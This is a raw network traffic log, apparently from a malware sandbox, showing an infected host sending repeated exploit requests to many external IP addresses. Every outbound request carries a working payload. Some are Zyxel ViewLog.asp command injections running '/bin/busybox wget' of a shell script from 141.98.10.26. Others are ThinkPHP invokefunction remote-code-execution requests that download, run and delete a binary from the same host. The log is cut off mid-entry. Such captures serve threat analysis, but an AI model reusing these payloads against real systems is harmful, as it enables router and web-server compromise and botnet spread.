Nov 22, 2023 08:38:20.785450935 CET	3772	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
158	192.168.2.23	52526	88.113.24.157	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:21.696320057 CET	3822	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:22.291356087 CET	3904	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
159	192.168.2.23	44902	112.172.161.120	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:22.203058958 CET	3901	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:22.497214079 CET	3912	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 22 Nov 2023 07:38:22 GMT Server: httpd Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
160	192.168.2.23	40328	112.126.197.172	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:22.216697931 CET	3902	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:22.527462959 CET	3917	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:34:47 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
161	192.168.2.23	51742	112.125.195.43	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:22.233952999 CET	3904	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:22.556906939 CET	3918	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:34:00 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
162	192.168.2.23	51286	94.120.212.206	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:23.188096046 CET	4007	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
163	192.168.2.23	60046	95.86.120.119	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:23.196743011 CET	4008	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
164	192.168.2.23	55558	62.101.96.230	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:23.385180950 CET	4079	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:23.596995115 CET	4094	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 07:38:23 GMT Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 246 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8f d1 4b c3 30 10 c6 df fb 57 9c 7b d2 87 e5 da 52 64 42 08 e8 da e1 a0 ce a2 dd 60 8f e9 72 2e 81 d9 d4 24 73 f8 df 9b 76 08 72 70 f0 dd 7d bf e3 3b 7e 53 be 2e db 7d 53 c1 73 fb 52 43 b3 7d aa d7 4b 98 cd 11 d7 55 bb 42 2c db f2 ba c9 59 8a 58 6d 66 22 e1 3a 7c 9e 04 d7 24 55 14 c1 84 13 89 22 2d 60 63 03 ac ec b9 57 1c af c3 84 e3 64 e2 9d 55 3f 23 97 89 7f 9e a8 12 3e 88 56 13 38 fa 3a 93 0f a4 60 fb 56 03 1e 8e 66 de 99 1e 77 86 2e b5 3d 32 e9 07 b8 48 0f 7d 84 3f 46 18 6c 0f 41 1b 0f 9e dc 37 39 c6 71 18 cf bb d8 a4 52 8e bc 17 8f 83 3c 68 c2 9c c5 ca e1 b6 a4 ce c8 fe 0e de 27 00 64 80 ec 21 67 d9 fd 82 a5 2c 2b a0 b1 2e c0 22 e5 f8 87 c7 e8 53 e8 18 73 7c 36 f9 05 62 75 4b 42 27 01 00 00 Data Ascii: MK0W{RdB`r.$svrp};~S.}SsRC}KUB,YXmf":\|$U"-`cWdU?#>V8:`Vfw.=2H}?FlA79qR<h'd!g,+."Ss\|6buKB'

Session ID	Source IP	Source Port	Destination IP	Destination Port
165	192.168.2.23	53520	94.121.119.139	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:23.414520979 CET	4080	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
166	192.168.2.23	46528	94.187.248.208	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:23.667263031 CET	4119	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:23.975621939 CET	4123	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
167	192.168.2.23	58196	94.120.44.4	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:23.857642889 CET	4122	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
168	192.168.2.23	54266	95.100.245.112	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:24.732819080 CET	4171	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:24.906207085 CET	4176	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:24 GMT Date: Wed, 22 Nov 2023 07:38:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 66 31 61 37 62 35 63 26 23 34 36 3b 31 37 30 30 36 33 38 37 30 34 26 23 34 36 3b 34 33 34 65 61 66 39 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.6f1a7b5c.1700638704.434eaf9b</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
169	192.168.2.23	51634	95.82.174.233	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:24.758640051 CET	4172	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:24.958986044 CET	4178	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:24 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
170	192.168.2.23	38718	95.134.9.177	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:24.778573036 CET	4173	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:25.418093920 CET	4290	IN	HTTP/1.1 404 Not Found Server: micro_httpd Date: Wed, 22 Nov 2023 09:38:25 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
171	192.168.2.23	57602	95.68.242.182	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:24.791635036 CET	4175	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:25.034219027 CET	4180	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 22 Nov 2023 07:38:19 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
172	192.168.2.23	44690	95.101.167.189	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:24.926460981 CET	4177	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:25.274935007 CET	4263	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:25 GMT Date: Wed, 22 Nov 2023 07:38:25 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 64 30 39 30 65 63 34 26 23 34 36 3b 31 37 30 30 36 33 38 37 30 35 26 23 34 36 3b 31 38 39 64 38 36 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2d090ec4.1700638705.189d86f</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
173	192.168.2.23	58014	95.100.139.78	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:24.988517046 CET	4178	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:25.198678017 CET	4242	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:25 GMT Date: Wed, 22 Nov 2023 07:38:25 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 35 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 30 36 33 38 37 30 35 26 23 34 36 3b 65 30 34 63 64 66 61 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.e586ba5d.1700638705.e04cdfaf</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
174	192.168.2.23	55812	95.86.66.8	80

Timestamp	kBytes transferred	Direction	Data
